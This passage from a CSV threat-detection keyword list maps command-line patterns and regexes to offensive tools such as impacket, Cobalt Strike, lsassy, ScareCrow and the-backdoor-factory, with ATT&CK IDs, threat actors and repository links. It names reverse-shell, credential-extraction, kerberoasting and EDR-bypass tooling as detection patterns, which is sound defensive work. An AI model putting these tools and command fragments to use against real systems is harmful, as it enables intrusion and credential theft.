Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1590" "* http-wordpress-users.nse*",".{0,1000}\shttp\-wordpress\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1591" "* http-xssed.nse*",".{0,1000}\shttp\-xssed\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1592" "* --hyperion-args *",".{0,1000}\s\-\-hyperion\-args\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","1593" "* --hyperion-path *",".{0,1000}\s\-\-hyperion\-path\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","1594" "* -I *.bin * -Loader dll*",".{0,1000}\s\-I\s.{0,1000}\.bin\s.{0,1000}\s\-Loader\sdll.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","N/A","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","1595" "* -i -H * -P * -s reverse_shell_tcp -a -u .moocowwow*",".{0,1000}\s\-i\s\-H\s.{0,1000}\s\-P\s.{0,1000}\s\-s\sreverse_shell_tcp\s\-a\s\-u\s\.moocowwow.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in 
development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","1596" "* -i havex.profile *",".{0,1000}\s\-i\shavex\.profile\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/cs2modrewrite","1","0","N/A","N/A","10","10","599","117","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z","1597" "* -i portscan445.gnmap -o 
shares_found.txt*",".{0,1000}\s\-i\sportscan445\.gnmap\s\-o\sshares_found\.txt.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","N/A","9","2","165","20","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z","1598" "* -i snmp-ips.txt -c community.txt*",".{0,1000}\s\-i\ssnmp\-ips\.txt\s\-c\scommunity\.txt.{0,1000}","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","0","N/A","N/A","N/A","6","594","90","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z","1600" "* -i -t hiphp:latest*",".{0,1000}\s\-i\s\-t\shiphp\:latest.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. 
It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","1601" "* iamassumeroleenum.py*",".{0,1000}\siamassumeroleenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","1602" "* iat_obfuscation.exe*",".{0,1000}\siat_obfuscation\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","1603" "* iax2-brute.nse*",".{0,1000}\siax2\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1604" "* iax2-version.nse*",".{0,1000}\siax2\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1605" "* icap-info.nse*",".{0,1000}\sicap\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1606" "* icebreaker.py*",".{0,1000}\sicebreaker\.py.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","1607" "* id_reverse-ssh.pub*",".{0,1000}\sid_reverse\-ssh\.pub.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","1610" "* IdentifyDomainAdmins.ahk*",".{0,1000}\sIdentifyDomainAdmins\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and 
testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","1611" "* IdentifyGroupMembershipActiveUser.ahk*",".{0,1000}\sIdentifyGroupMembershipActiveUser\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","1612" "* -Identity * -Set @{serviceprincipalname='*'}*",".{0,1000}\s\-Identity\s.{0,1000}\s\-Set\s\@\{serviceprincipalname\=\'.{0,1000}\'\}.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Targeted kerberoasting by setting SPN","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1613" "* -Identity * -XOR @{useraccountcontrol=4194304*",".{0,1000}\s\-Identity\s.{0,1000}\s\-XOR\s\@\{useraccountcontrol\=4194304.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Targeted kerberoasting we need ACL write permissions to set UserAccountControl flags for the target user. 
Using PowerView","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1614" "* iec-identify.nse*",".{0,1000}\siec\-identify\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1615" "* iis_controller.py*",".{0,1000}\siis_controller\.py.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","N/A","N/A","10","10","541","124","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z","1616" "* ike-version.nse*",".{0,1000}\sike\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1617" "* -im amass -ir *",".{0,1000}\s\-im\samass\s\-ir\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","1618" "* -im get-dns-records*",".{0,1000}\s\-im\sget\-dns\-records.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","1619" "* -im github-get-repositories*",".{0,1000}\s\-im\sgithub\-get\-repositories.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","1620" "* -im google-get-linkedIn-employees*",".{0,1000}\s\-im\sgoogle\-get\-linkedIn\-employees.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","1621" "* -im 
grep-through-commits*",".{0,1000}\s\-im\sgrep\-through\-commits.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","1622" "* -im massdns*",".{0,1000}\s\-im\smassdns.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","1623" "* imaohw*",".{0,1000}\simaohw.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed net user","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1624" "* imap-brute.nse*",".{0,1000}\simap\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1625" "* imap-capabilities.nse*",".{0,1000}\simap\-capabilities\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1626" "* imap-log4shell.nse*",".{0,1000}\simap\-log4shell\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","N/A","4","351","49","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z","1627" "* imap-ntlm-info.nse*",".{0,1000}\simap\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1628" "* impacket *",".{0,1000}\simpacket\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","N/A","10","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","1629" "* impacket*",".{0,1000}\simpacket.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","1630" "* impacket*",".{0,1000}\simpacket.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","1631" "* impacket.*",".{0,1000}\simpacket\..{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","1632" "* impacket/*",".{0,1000}\simpacket\/.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","1633" "* impacketfile.py*",".{0,1000}\simpacketfile\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","1634" "* --impersonate Administrator -shell *",".{0,1000}\s\-\-impersonate\sAdministrator\s\-shell\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","1635" "* -impersonate* -hashes*",".{0,1000}\s\-impersonate.{0,1000}\s\-hashes.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","1636" "* Impersonate.exe *",".{0,1000}\sImpersonate\.exe\s.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","0","N/A","N/A","10","4","301","38","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z","1637" "* impersonate.py *",".{0,1000}\simpersonate\.py\s.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","0","N/A","N/A","10","4","301","38","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z","1638" "* -ImpersonateUser *",".{0,1000}\s\-ImpersonateUser\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
